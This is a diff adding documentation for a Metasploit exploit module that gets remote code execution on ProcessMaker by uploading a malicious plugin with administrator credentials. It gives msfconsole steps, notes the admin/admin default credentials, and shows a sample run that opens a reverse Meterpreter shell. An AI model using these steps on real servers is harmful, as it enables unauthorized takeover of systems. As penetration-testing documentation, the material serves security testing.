Add documentation

documentation/modules/exploit/multi/http/processmaker_plugin_upload.md

@@ -0,0 +1,88 @@
+## Description
+
+  This module will generate and upload a plugin to ProcessMaker resulting in execution of PHP code as the web server user.
+
+  Credentials for a valid user account with Administrator roles is required to run this module.
+
+
+## Vulnerable Application
+
+  [ProcessMaker](https://www.processmaker.com/) workflow management software allows public and private organizations to automate document intensive, approval-based processes across departments and systems. Business users and process experts with no programming experience can design and run workflows.
+
+  This module has been tested successfully on ProcessMaker versions:
+
+  * 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0 on Windows 7 SP 1
+  * 3.2.0 on Debian Linux 8
+
+  Source and Installers:
+
+  * [ProcessMaker](https://sourceforge.net/projects/processmaker/files/ProcessMaker/)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/multi/http/processmaker_plugin_upload`
+  3. Do: `set RHOST [IP]`
+  4. Do: `set USERNAME [USERNAME]` (default: `admin`)
+  5. Do: `set PASSWORD [PASSWORD]` (default: `admin`)
+  6. Do: `set WORKSPACE [WORKSPACE]` (default: `workflow`)
+  7. Do: `run`
+  8. You should get a session
+
+
+## Options
+
+  **Username**
+
+  The username for a ProcessMaker user with Administrator roles (default: `admin`).
+
+  **Password**
+
+  The password for the ProcessMaker user (default: `admin`).
+
+  The default password for the `admin` user is `admin` on ProcessMaker versions 1.x and 2.x.
+
+  For ProcessMaker 3.x onwards, the default password is specified during installation and cannot be the same as the username.
+
+  However; when creating a new workspace a new user with Administrator roles is also created. The default username and password for the new user are `admin` and `admin` respectively.
+
+  **Workspace**
+
+  The ProcessMaker workspace for which the specified user has Administrator roles. (default: `workflow`)
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/multi/http/processmaker_plugin_upload 
+  msf exploit(processmaker_plugin_upload) > set rhost 172.16.191.202
+  rhost => 172.16.191.202
+  msf exploit(processmaker_plugin_upload) > set username admin
+  username => admin
+  msf exploit(processmaker_plugin_upload) > set password admin
+  password => admin
+  msf exploit(processmaker_plugin_upload) > set workspace sample
+  workspace => sample
+  msf exploit(processmaker_plugin_upload) > set rport 8080
+  rport => 8080
+  msf exploit(processmaker_plugin_upload) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [*] Authenticating as user 'admin'
+  [+] 172.16.191.202:8080 Authenticated as user 'admin'
+  [*] 172.16.191.202:8080 Uploading plugin 'zqkMpDOiIlNEvhkNnV' (23552 bytes)
+  [*] Sending stage (33986 bytes) to 172.16.191.202
+  [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.202:36592) at 2017-06-10 04:21:25 -0400
+  [+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV-.tar
+  [+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV.php
+  [+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV/class.zqkMpDOiIlNEvhkNnV.php
+
+  meterpreter > getuid
+  Server username: user (1000)
+  meterpreter > sysinfo 
+  Computer    : debian
+  OS          : Linux debian 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64
+  Meterpreter : php/linux
+  ```
+